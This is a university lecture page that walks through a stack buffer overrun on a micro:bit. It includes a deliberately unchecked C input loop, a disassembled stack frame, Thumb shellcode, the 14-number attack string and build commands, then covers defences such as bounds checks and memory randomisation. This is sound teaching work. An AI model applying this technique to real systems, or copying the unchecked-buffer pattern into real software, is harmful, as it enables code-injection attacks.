Lecture 7 – Buffer overrun attacks (Digital Systems)

The victim

One day, an Oxford undergraduate was conscientiously doing his IP1 practical, using C and the micro:bit instead of Scala and some bloated AMD64 machine with gigabytes of RAM. Here is the code that he wrote:

/* getnum -- read a line of input and convert to a number */
int getnum(void)
{
    char buf[64];
    getline(buf);
    return atoi(buf);
}

void init(void)
{
    int n = 0, total;
    int data[10];

    serial_init();

    printf("Enter numbers, 0 to finish\n");
    while (1) {
        int x = getnum();
        if (x == 0) break;
        data[n++] = x;
    }

    total = 0;
    for (int i = 0; i < n; i++)
        total += data[i];
    
    printf("Total = %d\n", total);    
}

That doesn't look too bad, does it? There's a subroutine getnum that reads a line of input and converts it into a number, and the main program uses it to read a sequence of numbers and store them in an array. Finally, the program adds together all of the numbers and prints the total. But already this program contains a horrendous bug, which will allow us, by feeding it carefully crafted input, to subvert it and run any code that we like. To show our power, we will force the program to print the string PWNED!.

The flaw in the program is that it doesn't check that the input contains at most 10 numbers, and continues to accept and store numbers even when the array is full. It is this weakness we shall exploit.

Context

This sort of sloppy programming is very common in C. It does little damage if the program is quickly written, used only locally, and quickly discarded. In other contexts, as we'll see, more care is very much needed to avoid security problems. There is actually another, more insidious, problem in the program, and that is the interface of the routine getline, which takes as a parameter the address of a character array to store the line, but has no what of knowing how big that array is, and so cannot guard against overflowing it. Routines in the C library such as gets – the same as getline here – are rightly deprecated for their unsafety. There's an alternative function fgets(buf, n, fp) that can read from an arbitrary file fp, not just the standard input, but crucially also accepts the maximum number of characters n that will fit in buf.

Mounting the attack

Used ordinarily, the program fulfils its purpose.

Enter numbers, ending with 0
> 123
> 456
> 7
> 0
Total = 586

After printing the total, the program ends, and we must press reset to use it again. But now let's try another sequence of 14 numbers.

Enter numbers, ending with 0
> -1610370930
> 1200113921
> 59387
> 1217
> 1262698824
> 555828293
> 32
> 1
> 1
> 1
> 1
> 1
> 1
> 536887217
> 0

As you will see, the program runs hayware, printing the same message over and over again. (In the lecture, I used a helper program squirt running on the host computer to automate typing in the numbers – but given enough patience it can be done by hand.)

Analysing the attack

So what are those 14 magic numbers, and how were they determined?

First, we notice that there are 14 numbers, and the buffer declared locally in init has space for only 10 numbers. The first 10 numbers that are input fill up the data array, and the remaining four are written by the program into the space beyond the array, overwriting whatever the program was storing there. To understand what is overwritten, and how this leads to subversion of the program, we need to look at the layout of init's stack frame.

    +--------------------------------+
    | Return address                 |
    +--------------------------------+
    | Saved R5 value                 |
    +--------------------------------+
    | Saved R4 value                 |
    +--------------------------------+
    | One word of padding            |
    +--------------------------------+
    |                                |
    | 10 words for data array        |
sp: |                                |
    +--------------------------------+

We can deduce the layout of init's frame by looking at its code, obtained by disassembling the program. The code begins like this:

00000224 <init>:
 224:   b530            push    {r4, r5, lr}
 226:   b08b            sub     sp, #44 ; 0x2c
 228:   f7ff ff4a       bl      c0 <serial_init>
 22c:   480d            ldr     r0, [pc, #52]   ; (264 <init+0x40>)
 22e:   f000 f947       bl      4c0 <printf>
 232:   2400            movs    r4, #0
 234:   f7ff ffec       bl      210 <getnum>
 238:   2800            cmp     r0, #0
 23a:   d004            beq.n   246 <init+0x22>
 23c:   00a3            lsls    r3, r4, #2
 23e:   466a            mov     r2, sp
 240:   5098            str     r0, [r3, r2]
 242:   3401            adds    r4, #1
 244:   e7f6            b.n     234 <init+0x10>

The function begins by saving three registers, then subtracting 44 from the stack pointer, enough space for the 40-byte data array, plus four bytes of padding that are included so as to keep the stack pointer a multiple of eight in obedience to the ARM calling convention.

The local variable n lives in register r4, and later in the function, the statement data[n++] = x is translated into the four instructions starting with lsls at address 0x23c: first r3 is set to 4*n, then r2 is set to the value of sp, and x, currently resident in r0 is stored into an address formed by adding r2 and r3, just as we would expect if the array begins at the stack pointer as the picture shows.

Is it fair to disassemble the target program and use this information to mount our attack? Yes, of course: in real life, we might be attacking a particular release of [a popular web browser], and we can download the code and study it to our heart's content, EULA notwithstanding.

Ok, we will make our attack string contain 10 integers to fill up the buffer, another three integers to overwrite the next three words of the stack, and then one more integer that will overwrite the return address of init with a value of our choosing. By doing this, we can arrange that when init returns, it will be to a place that we can control. We'll choose that place to be the buffer itself, and arrange that the data put in the buffer is the code we'd like to run. But where will the buffer be in memory? We can find that out by running the program on a test machine with the debugger, stopping it in init, and writing down the value of the stack pointer. That will allow us to calculate the address of each part of our attack string once it is copied into the data array by the victim. In a more complicated program, different calls to init might be made in different contexts, and there may be several possible values for the stack pointer; here there is only one.

The layout we plan for the attack string is like this:

40 bytes of code
Another 12 bytes of padding
Address of the code

There's one more piece of information we need to formulate the attack string, and that's the address of the subroutine printf, which we can use to print our message (and a ransom note). We can find that by disassembling the program or by looking in the map file output by the linker. If our target is open source, we can get all this information freely; if not, we might need to poke about a bit more with a disassembler, but it's not rocket science.

After the stack frame of init has been overwritten by the input loop, the rest of init runs as usual: the total of the 14 numbers we have input is computed and printed. Then init returns to our chosen return address, and the code we placed in the buffer starts to run.

Context

The layout of the stack frame for init is typical of many machines. Details will differ: for example, we can expect the return address to appear at different offsets from the start of the buffer. What most buffer overrun attacks have in common is that the return address of a subroutine can be overwritten by overflowing a buffer embedded in the stack frame.

Building a binary

We could piece together the attack string byte by byte, hardware manual in hand. But it's neater to use the assembler: here's the assembly language source for what we want, including the addresses we determined earlier:

    .equ printf, 0x4c0      @ Address of printf
    .equ frame, 0x20003fb0  @ Captured stack pointer value in init

    .text
attack:
    sub sp, #56             @  0: Reserve stack space again
again:
    adr r0, message         @  2: Address of our message
    ldr r1, =printf+1       @  4: Absolute address for call
    blx r1                  @  6: Call printf
    b again                 @  8: Spin forever
    .pool                   @ 12: constant pool
message:
    .asciz "HACKED!! "      @ 16: string -- 10 bytes
    .balign 4, 0            @ pad to 28 bytes
    .word 1, 1, 1, 1        @ 28: fill up to 44 bytes
    .word 1, 1              @ 44: Saved r4, r5
    .word frame+1           @ 52: Faked return address
                            @ Total size 56

By the time this code is reached, init will have deallocated the stack space that was used for the buffer, so the first task is to adjust the stack pointer, so that when we later call printf, its stack frame will not overwrite our code. Then there is a call that passes the message to printf, for simplicity calling it by first putting its absolute address in a register; the +1 is to mark it as Thumb code.^[1] Then the code enters an infinite loop while we wait for the ransom to be sent – in Bitcoin, naturally.

Some details to dispel any mystery:

The adr instruction assembles into an instruction add r0, pc, #n that sets r0 to the address of the message: the assembler determines the value of n.
The directive .pool places the constant printf+1 here in memory and fixes up the earlier ldr = instruction to refer to it.
The directive .asciz stores the characters of our message, terminated C-style with a zero byte.
The directive .align 5, 0 pads the program with zero bytes (0) until its size is a multiple of 32 = 2⁵.
Each .word directive contributes a four-byte word to the output of the assembler.
The .equ directives give the numeric value of the symbols printf and frame, obtained in earlier experiments.
We use a blx reg instruction instead of bl label just because it's marginally inconvenient to determine the displacement for bl, and an absolute address is easier to deal with.

There's a makefile that automates the process of building the demonstration. First, we can assemble the file attack.s into an object file attack.o.

arm-none-eabi-as -mcpu=cortex-m0 -mthumb attack.s -o attack.o

Next, we use objcopy to turn the .o file into a binary image.

arm-none-eabi-objcopy -O binary attack.o attack.bin

Then we can use the (slightly misnamed) hexdump utility to format the binary data as a sequence of decimal integers.

hexdump -v -e '/4 "%d\n"' attack.bin >attack

The file attack then contains the ten lines shown earlier as input to the milk bill program. There's a little program squirt that tuns on the host and outputs the text like keystrokes to the serial interface of the micro:bit.

Disassembling the file attack.o shows the correspondence between the input to the assembler and the 14 integers that make up the attack string.

00000000 <attack>:
   0:   b08e            sub     sp, #56 ; 0x38
   2:   a003            add     r0, pc, #12     ; (adr r0, 10 <message>)
   4:   4901            ldr     r1, [pc, #4]    ; (c <attack+0xc>)
   6:   4788            blx     r1
   8:   e7fb            b.n     2 <attack+0x2>
   a:   0000            .short  0x0000
   c:   000004c1        .word   0x000004c1

00000010 <message>:
  10:   4b434148        .word   0x4b434148
  14:   21214445        .word   0x21214445
  18:   00000020        .word   0x00000020
  1c:   00000001        .word   0x00000001
  20:   00000001        .word   0x00000001
  24:   00000001        .word   0x00000001
  28:   00000001        .word   0x00000001
  2c:   00000001        .word   0x00000001
  30:   00000001        .word   0x00000001
  34:   20003fb1        .word   0x20003fb1

For example, the first integer is -1610370930, and that is the (signed) value of the bitstring 0xa003b08e.

It's possible to use the debugger to capture the precise moment when the pc jumps to an unexpected value. Another page has a (manual) script to follow.

Defence against the dark arts

This example shows just how easy it is to write code with accidental vulnerabilities. There are many things that can be done to prevent such vulnerabilities from being exposed.

We could use a programming language that supports checking of array bounds, and makes it difficult to pass around the addresses of buffers without also passing and checking their size.
This attack depends on executing code that has been received as data: in the example, that code is stored in the region of memory that is used for the stack. On machines more sophisticated than the micro:bit, it's often possible to forbid executing code from anywhere but the code segment of the program.
Even microcontrollers that have separate address spaces for program and data make it difficult to accidentally execute data as instructions. Nevertheless, there has to be some way of doing it, or such microcontrollers would not be able to update their own firmware under program control, and that is a useful feature.
The attack depended on knowing a couple of addresses – the address of the getnum stack frame and the address of the existing printf subroutine. By randomising the layout of memory for each run of the program, it can be made more difficult to predict where such things will be found.

Linux has some at least of these defences enabled by default and repeating the attack there is rather more difficult.

Lecture 8

↑ That is to say, the blx r1 instruction on bigger ARM processors is capable of switching between Native ARM and Thumb modes, according to the least significant bit in the register r1 – that is the significance of the x in the mnemonic blx. The function printf is in Thumb code, so even on the Cortex-M0, we must carefully keep the processor in Thumb mode when calling it: hence the +1. For the same reason, the return address we plant in place of getnum's original return address also has a +1.

[1] That is to say, the blx r1 instruction on bigger ARM processors is capable of switching between Native ARM and Thumb modes, according to the least significant bit in the register r1 – that is the significance of the x in the mnemonic blx. The function printf is in Thumb code, so even on the Cortex-M0, we must carefully keep the processor in Thumb mode when calling it: hence the +1. For the same reason, the return address we plant in place of getnum's original return address also has a +1.

[1]

Lecture 7 – Buffer overrun attacks (Digital Systems)

Contents

The victim

Mounting the attack

Analysing the attack

Building a binary

Defence against the dark arts

Navigation menu

Lecture 7 – Buffer overrun attacks (Digital Systems)

The victim

Mounting the attack

Analysing the attack

Building a binary

Defence against the dark arts

Navigation menu

Search